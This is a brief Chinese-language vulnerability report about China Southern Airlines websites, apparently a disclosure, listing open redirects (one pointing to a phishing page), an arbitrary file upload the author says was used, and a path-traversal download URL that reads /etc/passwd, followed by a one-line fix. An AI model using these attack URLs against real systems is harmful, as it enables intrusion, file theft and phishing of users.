中国南方航空多个漏洞合集下载

中国南方航空多个漏洞合集，文件上传，文件下载，URL跳转。

任意地址跳转：

http://big5.csair.com/SuniT/www.baidu.com/index.html

http://big5.csair.com/SuniT/fish.cccsair.com/钓鱼.html

任意文件上传：

http://olcs2.csair.com/upload.php已经上传不确定文件位置。

文件下载：

http://www.csair.com/en/tourguide/before_ready/destination/download/download.php?FileName=download.php

http://www.csair.com/en/tourguide/before_ready/destination/download/download.php?FileName=../../../../../../../../../../../../../../../../etc/passwd

修复方案：

都需要加入权限判断，不能直接访问。